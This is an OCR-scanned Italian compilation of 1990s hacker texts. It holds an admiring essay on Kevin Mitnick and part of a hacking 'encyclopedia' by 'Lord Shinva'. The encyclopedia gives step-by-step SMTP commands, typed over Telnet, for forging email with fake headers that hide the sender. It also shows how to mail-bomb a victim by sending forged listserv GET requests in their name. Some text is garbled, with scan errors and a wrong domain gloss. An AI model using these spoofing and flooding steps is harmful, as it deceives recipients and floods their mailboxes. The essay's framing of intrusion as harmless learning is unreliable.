GRANDE ENCICLOPEDIA HACKER CRACKER E PHREAKER 


By ACondorA/ 


QUESTA E° UNA RACCOLTA DI MATERIALE REPERIBILE IN RETE ALCUNI TESTI SI 
RIFERISCONO A TECNICHE ORMAI SORPASSATE ED INUTILIZZABILI PER VIA DEI 
NUOVI SISTEMI DI PROTEZIONE ETC..MA LE HO INSERITE LO STESSO PERCHE’ ERANO 
DELLE GENIALITA’ E TROVO GIUSTO CHE RIMANGANO IN CIRCOLAZIONE QUANTO 
MENO PER DARE MERITO A COLORO CHE LE INVENTARONO. 


Utilizzare la sezione segnalibri come indice 


La storia infinita di Kevin David Mitnick, 

l'hacker più famoso del mondo, sotto processo negli Stati Uniti. E' in 

carcere da quattro anni e gli è stata respinta ogni richiesta di libertà su 
cauzione.;1. This is the End...my only friend, the End...E' il 14 

febbraio del 1995, giorno di San Valentino. In una cittadina americana sta 
accadendo qualcosa che scatenerà ribellioni, dimostrazioni, appelli via rete, 
la nascita di siti spontanei dicontro-informazione, la creazione di una 
colletta per realizzare un fondo spese legali...;Arriva un 

camioncino blu, un Van, con la scritta Sprint Telecomunications. Dal Van esce 
ungiapponese, due tecnici della Sprint, le forze speciali dell'FBI con 
giubbotti antiproiettile ed armialla mano. Sembra di vedere un film di 
azione. Ma non è così. A Raleigh, piccolo centro nelloStato del North 
Carolina, stanno per arrestare Kevin Mitnick.Le conseguenze di questo 
arresto saranno molteplici e non solo per le comunità underground ed 
hacker..;Iniziata nel 1981 con l'attacco da parte di Kevin, allora 
diciassettenne, ai sistemi Cosmos dellaPacific Bell (compagnia telefonica 
americana), la “caccia all'uomo” dell'FBI si conclude nel 1995,dopo 14 anni. 
Centosessantotto mesi di appostamenti, intercettazioni, false piste, arresti 
mancati.Il 14 febbraio si arriva alla conclusione di una lunga corsa, un 
inseguimento interminabile attraverso le reti di mezzo mondo. Quel giorno 
nasce il mito di Kevin Mitnick, l'hacker più famoso al mondo.;2. 

Gli inizi Kevin nasce in California. I suoi genitori divorziano quando lui ha 
appena 3 anni. Nella sua adolescenza rispecchia lo stereotipo classico 
dell'hacker: a 13 anni è un ragazzino solitario, grassotello. Inizia con i “CB”, 
a 8 anni è già radioamatore. Da ex-hacker,interpreto questa sua passione 
come una ricerca comunicativa: là fuori c'è qualcuno e lui ci vuole parlare, la 
distanza fisica non è più importante, a otto anni può dialogare con degli 
adulti che si trovano in altre città. Credo che in quel periodo sia nata in lui, 
forse inconsciamente, la passione per l'hacking, le reti, la 

comunicazione.; Nella più classica immagine americana della prima 

metà degli anni '70, il ragazzino brufoloso, occhialuto e ciccione ha 9 anni 

e vagabonda per i negozi di elettronica della sua città, prende pezzi usati, 

li ricicla, costruisce, assembla tecnologia trasmissiva tutto solo nella sua 
stanzetta, mentre i coetanei giocano a basket o “simply, they are hangin' on 
around the school” (cazzeggiano davanti alla scuola): diventa cliente assiduo 
di alcuni negozi, fa amicizia con i proprietari, forse inizia a fare qualche 
lavoretto da bravo teen-ager americano, ricevendo come paga dell'hardware 
usato.;Il ragazzino cresce, scopre i PC. Va oltre, fin da subito, 

scoprendo i modem: a 13 anni viene cacciato da scuola dal preside, 

perché entrava negli archivi degli altri istituti. Trasferisce la bolletta 
telefonica di un ospedale (30.000 US$) sul conto di uno che detestava.Si 
battezza Condor, dal film “I tre giorni del Condor”, con Robert Redford. Credo 
che un alias, un nickname, non sia mai stato più azzeccato: il Condor è 
solitario, lavora da solo, non si fida di nessuno, vive con la solitudine. E 
probabilmente Kevin/Condor trova nella Rete e nell'hacking una compagnia 
ideale, un qualcosa che lo rende meno solo.; Verso la fine degli 

anni '70, a 16 anni, come ogni bravo ragazzo americano, prende la patente: la 
targa della sua auto è X-HACKER. A 17 anni viene arrestato per la prima 
volta: furto di manuali informatici. Immagino Kevin, andatura insicura, occhiali 
da vista spessi,andare a cercare manuali per imparare, per capire dei 

sistemi informatici ai quali non poteva accedere, a cercare l'informazione. 


Io facevo trashing (letteralmente, rovistare nella spazzatura; farlo davanti 
alle sedi di aziende di informatica, università e compagnie 

di telecomunicazione produce spesso informazioni molto riservate), per 
trovare i manuali della Digital e imparare a programmare 
suVAX/VMS.;Seguono altri arresti, nell'83, nell'87 e nell'88, 

sempre per reati informatici. Un giudice di Los Angeles, la signora Mariana 
Pfaelzer, lo mette in carcere emettendo una condanna superiore a quella 
richiesta dal D.A (District Attorney, il Pubblico Ministero). Prima di farlo 
uscire dall'aula, gli dice: “Questa è l'ultima volta che fa una cosa simile, 
signor Mitnick”.Indubbiamente una frase profetica. Viene successivamente 
rilasciato, ma gli viene imposto il divieto di svolgere lavori che 
richiedanol'uso di un personal computer.;Oggi, nel 1999, ad 

alcuni anni di distanza, quello stesso giudice dovrà decidere se le richieste di 
risarcimento - presentate da multinazionali informatiche e pari ad un totale 
di ben ottanta milioni di dollari (sì, avete letto bene: hanno chiesto 
80.000.000 US$ didanni al Signor Kevin David Mitnick) - dovranno essere 
soddisfatte o meno. Buona fortuna, giudice Mariana.;Le aziende che 

hanno richiesto il risarcimento sono la Motorola, la Fujitsu, la Nokia, La Sun 
Microsystems, la Novell, la Nec. Il solo utile netto della Motorola nel 1995 
è stato di 22.247.000.000 di dollari.Con che coraggio queste aziende 
chiedono ottanta milioni di dollari ad un carcerato sotto processo, il quale non 
ha fatto altro che copiare delle informazioni per propria cultura personale, 
senza rivenderle, modificarle o distruggerle?;3. Il “Condor” vola 

troppo in alto. Anni '90. Kevin è cresciuto. E' sempre più Condor. E' un 
fantasma, come scrissero in seguito. Non esiste. Vive dirottando i 

propri conti su altre utenze. Gira gli States, notebook e cellulare 

modificato. Pone molta attenzione durante le connessioni, cambia 

spesso numeri telefonici, appartamento. Si sposta di continuo. Esplode, 
probabilmente, il suo odio verso le “Big Companies”: IBM, Digital,Sun 
Microsystems, Fujitsu. Tutte hanno dei segreti da custodire. Il Condor cerca la 
libertà d'informazione. Vuole la verità, vuole i bug, i famosi difetti, 

errori di programmazione compiuti dalle software house, per poter accedere ai 
sistemi informatici protetti.;Dalla prima metà degli anni '90, sino 

al suo arresto, Kevin cresce ancora. E' molto attirato dai sistemi VA X della 
Digital: sono i soli a non avere praticamente bug, a non essere “sfondabili”. 
Allora il Condor agisce, silenzioso. Utilizza Social Engineering, una 
tecnica hacking per carpire telefonicamente informazioni spacciandosi per 
un'altra persona, un collega di una filiale. Ottiene tutto quello che vuole. 
Viola il sistema di un Internet Provider inglese. A quel sistema è abbonato, 
come utente regolare, un consulente della Digital.;E' stato tra i 

creatori del VMS, il sistema operativo proprietario dei VAX Digital, ed ora 
effettua consulenze alla Digital sulla sicurezza. I bug ci sono. Vengono 
scoperti da quest'uomo. E Kevin gli spia le e-mail. Apprende i segreti più 
segreti della Digital, ilsuo intento era quello: se non posso ottenere le 
informazioni in un modo, le ottengo in un altro.;L'FBI è sui suoi 

passi. Lui lo sa. Spia le comunicazioni tra la sede centrale dell'FBI e gli 
agenti dislocati, i quali lo stanno cercando per mezza America. Non appena 
l'FBI dà l'ordine “ok, andate a prenderlo”, lui sparisce. Li prende in giro. 
Falsifica le comunicazioni.E' un'ombra sulla Rete, nessuno sa dove sia 
fisicamente.;Kevin nel frattempo è entrato ovunque: multinazionali, 

società d'informatica, agenzie governative. Entra e copia: progetti, 


piani, budget, business plan, contatti, consulenze esterne. Non vende nulla, 

non baratta, non cancella: apprende, impara, conosce. Per lui la conoscenza è 
importante. Sa come funzionano le cose. Capisce che il nuovo business sta 
partendo: telecomunicazioni, telefonia cellulare, satellitare, pay-Tv. I bit 
avanzano, l'analogico scompare. Kevin lo sa. Forse inizia a capire il potere che 
ha in mano.;Lo capiscono anche altre persone. Kevin ha accesso ad 
informazioni riservatissime, e questo dà molto fastidio alle 

multinazionali.Le lobby USA si muovono, l'FBI lo inserisce ufficialmente tra 

i “Top Wanted”, come per i peggiori criminali.;L'Fbi ha capito, le 
multinazionali anche, le lobby hanno provveduto: mancano i mass-media. Come per 
magia, appare un articolo sulla prima pagina del New York Times, il 4 luglio 
1994: racconta dell'esistenza del Condor. Kevin diventa un personaggio. Ma 
èsempre più braccato. John Markoff, l'autore dell'articolo, fa di tutto per 
incontrarlo. Corrompe alcuni suoi “amici”, collabora con l'FBI per 
incastrarlo.;4. Inizia la guerra: Davide e GoliaNel dicembre 

del 1994, appare un messaggio sul computer di Tsutomu Shimomura, 
nippo-americano, super esperto di sicurezza, consulente del Governo 
USA.;Non c'è scritto molto, solo un “Found me: I am on the Net”. 

Trovami, sono sulla Rete, gli dice Kevin.;La sfida ha inizio. Per 

la prima volta, le armi sono diverse: è una caccia all'uomo on-line. Le maggiori 
compagnie di telecomunicazione americane collaborano con l'FBI. La Sprint 
Corporation fornisce manuali, schede, tecnici specializzati. Il Condor è 
braccato.;Kevin ha utilizzato, tra i primi al mondo, la tecnica 

dell'IP-spoofing, nel dicembre del 1994, per attaccare i server di Shimomura 
con sede a San Diego. Shimomura commenta questa tecnica ad una conferenza 
americana (CMAD), nel gennaio del 1995. Pare dunque che inizi, sin da subito, 
lo sfruttamento del Condor, delle sue tecniche, della sua abilità, del suo stile 
stile e delle sue competenze.;Markoff scrive altri articoli, accusa 

Kevin, lo dipinge come il “criminale”. Kevin ama, come molti hacker, la stampa. 
Vuole dire la sua.Non accetta giudizi senza poter ribattere. Contatta 

Jonathan Littman. Arriva a chiamarlo tre volte al giorno. Forse, da 

Questo momento in poi, il Condor perde la sua freddezza, la sua lucidità, i 

suoi attenti calcoli. Compie degli errori. Deve cambiare città sempre più 
spesso. Non capisce le motivazioni di tanto clamore attorno al suo caso. Discute 
con il giornalista “buono” di hacking, di politica, di tecnologia, di donne, 

di costume. Littman lo definirà “una mente esplosiva, incontrollabile, 
incredibilmente potente”.Littman sbaglia: come in ogni “grande rovina”, 
all'origine c'è un errore. Parla con Markoff, si confida. Gli rivela dove si 

trova Kevin. Lo rivela al collega giornalista, all'amico John. Markoff, il 

quale informa immediatamente Shimomura. Il cerchio si stringe. Kevin crede 
diessere tranquillo. Ha fiducia nel suo confidente. Una volta un hacker mi 
disse: “Trust no 1: non fidarti mai di nessuno”. Kevin avrebbe dovuto 
incontrare quell'hacker, forse sarebbe andata diversamente. John Markoff o 
Shimomura — ma è indifferente — informano l'FBI. Il Condor sta per 
cadere.;Torniamo al 14 febbraio del 1995. Kevin viene arrestato. 

Non uscirà mai più dal carcere. Amici, conoscenti, hacker, amanti 

Della libertà d'espressione, dell'open source, della libera comunicazione, 
anarchici, hanno fondato un sito 

web,http://www.kevinmitnick.com. Sull'home page c'è un contatore. Non è 

il classico counter per gli accessi. Scorre veloce, di continuo. Purtroppo non 
testimonia una cosa allegra, come l'alto numero di visitatori. Le cifre 


scorrono, a rotazione, e contano:;4 ANNI, 4 MESI, 22 

GIORNI, 13 ORE, 8 MINUTI, 33 SECONDI...4 ANNI, 4 MESI, 22 GIORNI, 13 ORE, 8 
MINUTI, 34 SECONDI4 ANNI, 4 MESI, 22 GIORNI, 13 ORE, 8 MINUTI, 35 
SECONDI. La frase sopra recita:” Kevin Mitnick è stato imprigionato dal 
Governo Americano, prima della sentenza, da:...;5. Vola mio Condor, 

vola sempre più in alto. Kevin Mitnick è la punta di un iceberg, a mio 

parere. E' diventato il capro espiatorio. Gli Usa, le multinazionali, le 

aziende informatiche, vogliono una vittima. Un caso esemplare. Una condanna 
altrettanto esemplare. Vogliono un esempio, un precedente.; Negli 

Stati Uniti la detenzione media per omicidio colposo è di 3 anni: Kevin è dentro 
da 4; non ha ancora avuto un processo; il numero dei capi d'imputazione 
assegnatigli farebbe impallidire Al Capone; è stato messo in isolamento per otto 
mesi; ci sono migliaia di persone al mondo che lottano per i suoi ideali, ma 

lui non lo sa; gli è stata rifiutata ogni richiesta di libertà su 

cauzione;gli furono sequestrati computer, modem, persino la radio: avrebbe 
potuto modificarla per comunicare con l'esterno, dissero.;L'amato 

Mr. Shimomura, insieme al degno compare Markoff (sembrano il gatto e la volpe), 
nel frattempo, hanno incassato un anticipo di 750.000 US$ per il libro che 
hanno scritto, “Sulle tracce di Kevin” (edizione Sperling &amp; Kupfler). 
Recentemente hanno venduto i diritti per il film, e Kevin marcisce in una 
prigione americana, e continua a non sapere cosa gli succede intorno, 

cos'è diventato il Web - quelle “3 W” che tanto ci stanno cambiando la vita - 
che lui ha contribuito a rendere più sicuro.;Il ragazzo che voleva 

il “cyber-world” libero, gratuito ed accessibile a tutti, l'uomo che voleva dei 
sistemi sicuri, l'uomo che ha ispirato due generazione di hackers, guarda 

dalle sbarre i fili telefonici, immagina i segnali satellitari, le reti GSM a 

1800 MHz che spingono i segnali. Io telefono, e la “centrale” sa dove sono 
fisicamente, voi vi collegate al Web, e pagate la connessione, l'abbonamento, 
gli scatti, i megabytes scaricati. L'hacker che voleva l'informazione come un 
diritto innegabile dell'uomo, l'informazione gratuita, vera e totale, il 

condor che voleva volare in alto, è stato rinchiuso, è stato ridotto al 

silenzio.; Non posso dire altro, a voi che leggete, se non farvi 

riflettere su una cosa: se i diritti costituzionali possono essere messi da 

parte nella Grande America per Kevin Mitnick, cosa vi fa pensare che non 
sarebbe lo stesso con voi al suo posto?;E non posso augurare altro, 

al buon Kevin Mitnick, se non di volare. Vola mio Condor, vola sempre più in 
alto. 
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2 Lord Shinva 
-DiGiTAL::ALLIANCE- 
C:0.N:F.E:D.E:R.A:T.1:0.N 
Enciclopedia dell' Hacking 
Volume 1 


PREFAZIONE 

In seguito alle moltissime richieste di informazioni sull'hacking, noi del 
D.A.C. abbiamo deciso di scrivere una serie di "volumi" sull'argomento, per 
spiegare in modo semplice e graduale le basi dell'hacking. 


Le informazioni che ci accingiamo a darvi con la presente "Enciclopedia" 
sono solo a scopo informativo. 

L'autore, Lord Shinva, declina ogni responsabilita’ per l'uso di queste 
informazioni. 

L'autore si riserva inoltre la possibilita’ di ritardare o interrompere in 
qualsiasi momento la pubblicazione di questa serie di documenti in caso di 
uso improprio degli stessi. 


Questo documento puo” essere liberamente distribuito purche° non modificato. 
Sono VIETATE la vendita e la duplicazione integrale o parziale con qualsiasi 
mezzo e in qualsiasi modo. Tutti i diritti sono riservati dall'autore. 


GLOSSARIO 

- IP Address 
Indirizzo numerico composto da quattro numeri (ad esempio 123.45.67.8) che 
identifica il vostro computer sulla rete. Un IP Address e’ unico e 
corrisponde ad un Host Name 


- Host Name 

Nome in formato standard Internet di un sito. Ad esempio sara’ del tipo 
www.prova.com per un provider o un sito generico, mentre nel caso di un 
collegamento via modem di un utente al suo provider potra’ somigliare a 
pppl4-ro.provider.it. 
Le estensioni piu’ usate sono: 

.com sito commerciale ("com") generico 

.0rg organizzazione ("org") senza fini di lucro 

.mil sito militare ("mil") USA 
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.net rete (in inglese "net") sito generico 
e i vari .it (Italia) .uk (Inghilterra) .ca (California), ecc. 


- Client 
Programma "cliente", usato da un utente per collegarsi ad un servizio. 
Ad esempio, Netscape e Microsoft Explorer sono client per collegarsi al 
servizio Web (HTTP), Eudora e’ un client per collegarsi al servizio e-mail 
(SMTP/POP3), Cute FTP e WS-FTP sono client per collegarsi a FTP, e così 
via. E° in pratica un programma che viene usato per comunicare con un 
server. 


- Server 
Programma che svolge un servizio e si occupa di rispondere ai client. 
Ad esempio, i provider hanno un Web Server per offrirvi la possibilit... 
di collegarvi ad Internet tramite il Web. 


- Protocollo 
Insieme di regole per la gestione di un servizio Internet come web, email 


- Servizi: nomi tecnici 
I servizi disponibili su Internet sono: Web (pagine ipertestuali), FTP 
(trasferimento file), e-mail, news, IRC, ecc. 
Ecco alcuni nomi tecnici e relativo servizio: 
HTTP e il nome del protocollo del web 
SMTP e-mail, posta in uscita 
POP3 e-mail, posta in arrivo 
IMAP e-mail, e° un altro tipo di posta in arrivo, meno usato 


- DNS (Domain Name Server) 
E' la funzione svolta da un computer situato sulla rete che si occupa di 
risalire a un IP Address da un Host Name e viceversa (se ad esempio volete 
conoscere l'IP Address di www.prova.com utilizzando il DNS otterrete una 
risposta del tipo 123.45.67.8, ma e’ anche possibile fare il contrario). 
L'operazione per la quale si risale dall'IP Address (numerico) all'Host 
Name (nome) viene detta Reverse DNS. 
Il DNS viene utilizzato automaticamente da tutti i programmi per Internet, 
in quanto Internet non "capisce" gli Host Name, e ha bisogno di conoscere 
il relativo IP Address per riuscire a collegarsi ad un sito (Host). 
E' anche possibile utilizzarlo volutamente, per risalire a qualcuno, ecc. 


FONDAMENTI 


a ai Ta 


Prima di iniziare con l'hacking vero e proprio e necessario iniziare con 
una breve lezione sull'anonimita’. 
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Infatti, quando effettuate un'operazione qualsiasi sulla rete, lasciate 

tracce di voi ovunque. 

Questo e° particolarmente vero per il web, in quanto ogniqualvolta ci si 
collega ad un server o si inviano dati vengono automaticamente trasmesse 
informazioni come: da quale server (e quindi da quale citta’) si sta 
chiamando, il nome ed il produttore del programma che si sta usando, quale 
sistema operativo e’ installato sul vostro PC, il vostro IP address, qual'e 
l'ultimo sito visitato, se, quando e quante volte ci si e collegati ad un 

sito, e talvolta anche il proprio indirizzo di e-mail. 


Mentre lasciare simili informazioni in giro puo’ non costituire un pericolo 
per un utente qualsiasi, per un hacker la cosa diventa alquanto pericolosa. 
In pratica e come se lasciaste un biglietto da visita (beh... quasi un 
curriculum!) ad ogni collegamento che effettuate. 


Molti siti utilizzano anche un comodo meccanismo di identificazione messo a 
disposizione dei browser (Netscape, Internet Explorer, Mosaic) che li aiuta 
ad identificarvi anche a distanza di tempo, e puo rivelare loro la 

frequenza con cui visitate dei siti, IP address, ed altre informazioni che 

non vorreste dare. Il file in questione e denominato "cookie". 

Se usate Netscape lo troverete nella directory del browser con l'innocuo 
nome di "cookies.txt". Non e’ altro che un semplice file di testo, come 
questo che state leggendo. Bastera” eliminarlo dopo ogni collegamento per 
eliminare le informazioni che esso puo” rivelare. Se utilizzate siti che 
richiedono accesso con password puo” darsi che il cookie contenga delle 
informazioni necessarie al vostro collegamento: in tal caso bastera editare 
il file ed eliminare solo le righe che non contengono il nome del sito in 
questione. 


I "cookies" possono essere disabilitati in alcuni browser (come Netscape). 
Lo stesso vale per altre tecnologie ancor piu’ pericolose (per la privacy), 
come Java e JavaScript. Rendono piu’ allegre le pagine Web... e ancor 
piu allegri quelli che vogliono sapere chi, come e quando si collega a 
una pagina. 


Un mezzo molto usato fino a poco tempo fa per nascondere le proprie tracce 
sul Web era l'Anonimizzatore (http://www.anonymizer.com), ma mentre prima 
era gratuito ora e° diventato a pagamento. Lo si puo ancora utilizzare, ma 
prima di visualizzare la pagina Web desiderata, l'utente e’ costretto ad 
attendere circa mezzo minuto. Inoltre questo servizio e’ ora in grado di 
riconoscere un tentativo di hacking e si rifiuta di eseguire il collegamento. 


Per quanto riguarda invece le e-mail (posta elettronica) il discorso cambia. 
In realta’, un hacker non usa quasi mai altro che un solo programma: Telnet. 
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Se non siete ancora in possesso di un client (programma utente) Telnet vi 
consiglio di prelevarlo al piu” presto dalla rete (ad esempio, cercando su 
http://www.shareware.com). 

Telnet non e’ altro che un servizio di banca dati, con messaggi, programmi 
e cose del genere, proprio come nelle vecchie BBS. 


Ma perche utilizzare proprio Telnet? 


In realta’, un client Telnet fa poco piu che collegarsi a un server, 
inviargli tutto quello che scrivete e mostrarvi tutto quello che riceve dal 
server. 


Puo in effetti sostituire (limitatamente) un qualsiasi altro client. 


Un esempio: quando usate un browser (Netscape, Explorer, ecc.) per collegarvi 
ad un sito Web, il programma non fa altro che svolgere una sessione Telnet. 

In parole semplici: invia un comando simile a "dammi il file xxxxx" e aspetta 
che il server glielo invii. 

Lo stesso accade con FTP, e in modo appena diverso per la posta elettronica. 


Come vediamo, quindi, usando Telnet noi possiamo impersonare un qualsiasi 
programma client, parlando al server e leggendo le sue risposte. 


Ma per quale motivo dovremmo farlo? E° presto detto. 


Soffermiamoci un momento su questa cosa: un servizio, ad esempio e-mail, 
e’ stato progettato perche’ dall'altro capo della connessione ci sia un 
programma client che segua certe regole (ad esempio Eudora per la posta). 


Ma cosa succede se invece di un programma c'e un hacker che "finge" di 
essere il programma e invece di seguire le regole standard fa altre cose 
non previste? 

Succede che si puo’ sovvertire il servizio, e si possono fare le cose piu 
disparate. 


Alcuni esempi: sovvertendo e-mail si puo inviare posta elettronica "falsa" 
(detta FakeMail) che sembri provenire da chiunque noi vogliamo, sovvertendo 
il Web si puo crashare (da "crash": distruggere, in senso virtuale) un 

server, con FTP si puo ottenere un livello di anonimita’ elevatissimo ed 

e’ possibile infiltrarsi anche dove non si e desiderati, e così’ via; per 
praticamente ogni servizio esistente vi sono delle tecniche applicabili. 


E infine, con quasi tutti i servizi (e in particolar modo con la SMTP) 
esistono dei modi per ottenere il tanto agognato accesso "root", in pratica 
il livello dell'amministratore di sistema (detto SysAdmin) che puo” fare 
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nie sana tl ui 
*qualsiasi* cosa: creare, aggiungere o eliminare account, file e director 
utenti con qualsiasi livello d'accesso, leggere la posta e 1 file degli 

utenti, attivare e disattivare servizi, modificare programmi... 


Nel prossimo volume ci occuperemo della falsificazione e identificazione di 
posta elettronica e news. 


Copyright (C) 1997 by 
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TELNET E SMTP 
Supponiamo di voler, per un motivo qualsiasi, inviare una e-mail a qualcuno 
facendo sembrare che essa sia stata mandata da qualcun altro. 


Il metodo piu’ semplice e utilizzare uno dei siti per hackers che offrono la 
possibilita’ di inviare FakeMail (basta cercare questa parola in un motore di 
ricerca su Internet, ad esempio www.yahoo.com ha una sezione apposita per 
FakeMail e posta anonima). 


Ma per ora tralasciamo 1 siti e vediamo in pratica come funziona la tecnica 
delle FakeMail (che tra l'altro e applicabile, in modo diverso, anche alle 
news). 


Il motivo per cui la studieremo e° che provandone il funzionamento, ne 
approfitteremo per imparare ad utilizzare Telnet e soprattutto SMTP, ovvero 
il servizio della posta in uscita. 

Questa e infatti la base per capire come funzionano molte delle tecniche 
piu utilizzate, e vi permettera’, quando sarete padroni della materia, di 
implementarne di nuove. 


Iniziamo dunque imparando ad usare Telnet. 


Usandolo per collegarvi a un sito semplicemente inserendo un host name, vi 
collegherete al servizio Telnet. Ma abbiamo detto che non e° questo il 
nostro obiettivo. A noi interessa il servizio SMTP. Dunque, come fare per 
accedervi? 


Bisognera' inserire, oltre all'indirizzo del server a cui vogliamo 
collegarci, anche un numero di "porta". Ma cos'e’ una porta? 

Se riflettete, ogni server ha un unico indirizzo "centrale" (nome.com) ma 
gestisce molti servizi (web, ftp, posta...). Di conseguenza dovrebbe avere 
altrettanti server su altrettanti indirizzi diversi. 


Per evitare un proliferare di indirizzi inutili esistono le porte, in pratica 
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nient'altro numeri a cui sono associati i vari servizi. 

Vogliamo collegarci a SMTP? Basta utilizzare la porta 25. Ci interessano 
le news? La porta e° 119. Oppure FTP, porta 21... sono tutti numeri "fissi" 
(standard) e quindi, tranne in rarissimi casi, collegandosi - per esempio - 
alla porta 25 ci rispondera. sempre SMTP. 


NOTA: se avete Winsock potete leggere il file "services", contenente i numeri 
delle porte piu usate. Il file si trovera’ nella directory di Winsock. 


Ora che abbiamo chiarito il discorso delle porte, supponiamo di volerci 
collegare a SMTP usando Telnet. Scegliamo un server qualsiasi (sono davvero 
rari i casi in cui un server non gestisca la posta) e, in base al programma 

usato, dovremmo operare differentemente. 

La maggior parte di essi funziona in questo modo: per collegarsi a SMTP del 
server prova.it bisogna inserire prova.it:25 come nome del server. 

Alcuni invece non prevedono l'uso dei due punti per delimitare nome e porta, 
ma hanno uno spazio in cui inserire, separatamente, il numero o il nome del 
Servizio. 


Dunque, una volta connessi a prova.it:25 avremo un messaggio di questo tipo: 
220 prova.it Sendmail x.x/x.x 11/11/97 ready at Mon, 30 Oct 97 06:22:19 -0200 


e niente altro. Il server sta ora aspettando comandi da parte nostra. 
La prima cosa da fare e° identificarsi, e cio’ va fatto con il comando HELO 
in questo modo: 


HELO nomeprovider.it 
sostituendo nomeprovider.it con il nome del nostro provider. 


NOTA: usando Telnet *NON* e’ possibile cancellare. Quindi digitate senza 
fretta, e se proprio sbagliate riavviate la connessione e ripetete tutto, 

oppure - in alcuni casi - puo essere sufficiente premere invio e riscrivere 

la riga da zero. Non cancellate, anche se sembra funzionare. I risultati 
possono essere imprevedibili e potreste rivelare la vostra identita’. 


Talvolta e’ possibile inserire un nome falso, ma i nuovi server conoscono 
gia il vostro IP Address quando vi collegate, quindi tanto vale inserire il 
vero nome. 


La risposta sara: 


250 prova.it Hello NOMEPROVIDER.IT, pleased to meet you 
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A questo punto dovremo dire al server qual'e’ il nostro indirizzo di e-mail. 
Usiamo allo scopo il comando "MAIL FROM" e digitiamo: 


MAIL FROM: <Bill_ Gates @ microsoft.com> 


...OVviamente l'indirizzo da inserire e° quello falso =) 
Il server rispondera’ con un messaggio. Se avremo sbagliato qualcosa, sara’ 
un messaggio d'errore, e dovremo ripetere l'immissione. 


A questo punto dobbiamo scegliere la nostra "vittima", che supponiamo essere 
vittima@lamer.it. Usiamo il comando "RCPT TO" e scriviamo: 


RCPT TO: <vittima@lamer.it> 
Il server rispondera’ con un altro messaggio. 


Ed ora che abbiamo definito sorgente e destinazione passiamo all'invio delle 
intestazioni e del corpo del messaggio. 
Avvisiamo il server che siamo pronti, scrivendo: 


DATA 


e il server ci dira’ di scrivere il messaggio e di concludere con un punto 
su una riga vuota. 


Fermiamoci un attimo. In ogni e-mail esistono delle intestazioni (headers) 
che si trovano prima del corpo del messaggio vero e proprio. Il loro scopo 
e’ elencare tutti i computer attraverso i quali e’ passato il messaggio, 
nonche’ il nostro IP Address! Cio° potrebbe rivelare la nostra identita’ a 
un hacker o a un SysAdmin esperto. Per evitarlo, digitiamo: 


Received: by nomeprovider.it id AA11212 with SMTP; Sun, 12 Oct 97 13:40:58 


dove nomeprovider.it e’ il nome del vostro provider (quello che avete usato 
con HELO) e l'ultima parte (Sun, 12 Oct...) e’ la data in formato standard. 

ID AA11212 va cambiato. Potete mettere un numero qualsiasi (possibilmente 
che inizi con AAI piu altre 4 cifre, per farlo sembrare piu’ reale). 

Si tratta solo di un numero di serie del server, niente di importante. 

Ora dobbiamo digitare: 


Message-ID: <123.AA11345 @ microsoft.com> 


Cio serve a far credere che il messaggio sia partito effettivamente dal 
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server "microsoft.com" con l'ID AA11345 (puo essere un numero qualsiasi, 
purche® NON uguale a quello inserito prima con l'intestazione "Received:"). 


Inseriamo ora di nuovo il destinatario, la data e il soggetto della e-mail: 


To: <vittima@lamer.it> 
Date: Sun, 12 Oct 97 11:30:27 
Subject: questa e° una prova... 


Lasciamo uno spazio e scriviamo il messaggio che vogliamo inviare (lungo 
quanto vogliamo). Per concludere il messaggio lasciamo due righe vuote, 
digitiamo un punto, premiamo invio, scriviamo QUIT e invio. 

La FakeMail verra’ inviata automaticamente dal server, e noi possiamo anche 
chiudere Telnet. 


E° importante inviare a se stessi dei messaggi di prova per vedere se 1l 
server scelto ha ricevuto i dati correttamente, se non sono stati commessi 
errori e, soprattutto, per vedere se il proprio IP Address si trova in 
mezzo alle intestazioni "Received:", oppure (sbagliato) alla fine. 


Ora che sappiamo come fare ad inviare una FakeMail, possiamo passare al 
passo successivo: usare le FakeMail per far danni... vogliamo seppellire 

la mailbox di qualcuno? 

Creiamo una normale FakeMail con il metodo spiegato sopra, ma come mittente 
dovremo inserire l'indirizzo e-mail della vittima e come destinatario usiamo 

un "listserv" (come ad esempio listserv@brownvm.brown.edu). 

Un Listserv e’ un programma che invia programmi tramite e-mail nel caso non 
si riesca a prelevarlo via FTP. 


Se ad esempio sappiamo che nella directory "mieifiles" del server pluto.it 

c'e un file di 20 megabyte il cui nome e’ "enorme.gz" possiamo fare in modo 
che quei 20 MB vengano inviati sotto forma di testo nella e-mail della 

nostra vittima... 

Nell'esempio di cui sopra, dopo aver scritto i primi comandi della FakeMail, 
arrivati a "Subject:" scriviamo quanto segue: 


REPLY vittima@lamer.it 
CONNECT pluto.it anonymous indirizzo @ falso.com 
BINARY 


GET mieifiles/enorme.gz 
QUIT 


e concludiamo quindi con le due righe vuote, il punto, QUIT, ecc. 


Ecco la spiegazione passo passo: 
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REPLY indica l'indirizzo e-mail a cui rispondere 

CONNECT specifica il nome del provider a cui collegarsi e l'account da usare 
BINARY specifica un file di tipo binario (non va cambiato) 

GET specifica il nome del file da prelevare (completo di eventuali directory) 
QUIT termina la connessione 


Ovviamente, se dopo GET anziche’ QUIT usiamo altri GET, il risultato sara” 
molto piu’ dannoso. Nel caso di un file di 20 MB, riscrivendo altre 10 

volte il comando "GET ..." verranno mandati un totale di ben 200 megabyte al 
povero utente destinatario! 

E poiche 1 server di e-mail spezzano i messaggi in tanti piccoli messaggi, 

la vittima riceverebbe migliaia e migliaia di messaggi... 

E° un buon motivo per non dare in giro il proprio indirizzo di e-mail, no? 


Nel prossimo volume impareremo a scrivere messaggi totalmente anonimi, a 
riconoscere un messaggio falso da uno vero e ad identificare il computer da 
cui e’ partito un attacco. 

Piu in la spiegheremo anche come rendersi al 100% invisibili utilizzando 
tecniche estremamente raffinate. 


Copyright (C) 1997 by 
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EMAIL E IDENTIFICAZIONE 

Per concludere 1l nostro studio su FakeMail e messaggi anonimi, vedremo ora 
come riconoscere una e-mail "vera" da una "falsa", come identificarne (in 
parte) l'autore, e come utilizzare i remailer anonimi per un'anonimita’ di 
livello elevatissimo. 


Per poter studiare un messaggio dobbiamo necessariamente essere in grado di 
leggerne gli "headers" (intestazioni), cioe’ quelle righe che iniziano con 

la parola "Received:" e simili, che si trovano prima del corpo del messaggio 
vero e proprio). 


Visualizzare gli headers e° semplice: ogni programma di posta elettronica ha 
un'opzione (in genere nel menu) per attivare/disattivare la visualizzazione 
degli stessi. 

Netscape Mail, ad esempio, ha la voce "Show Headers" nel menu "Options", 
mentre con "Internet Explorer" e° necessario cliccare sul titolo dell'e-mail 

da analizzare, quindi premere il tasto destro e scegliere l'ultima voce 
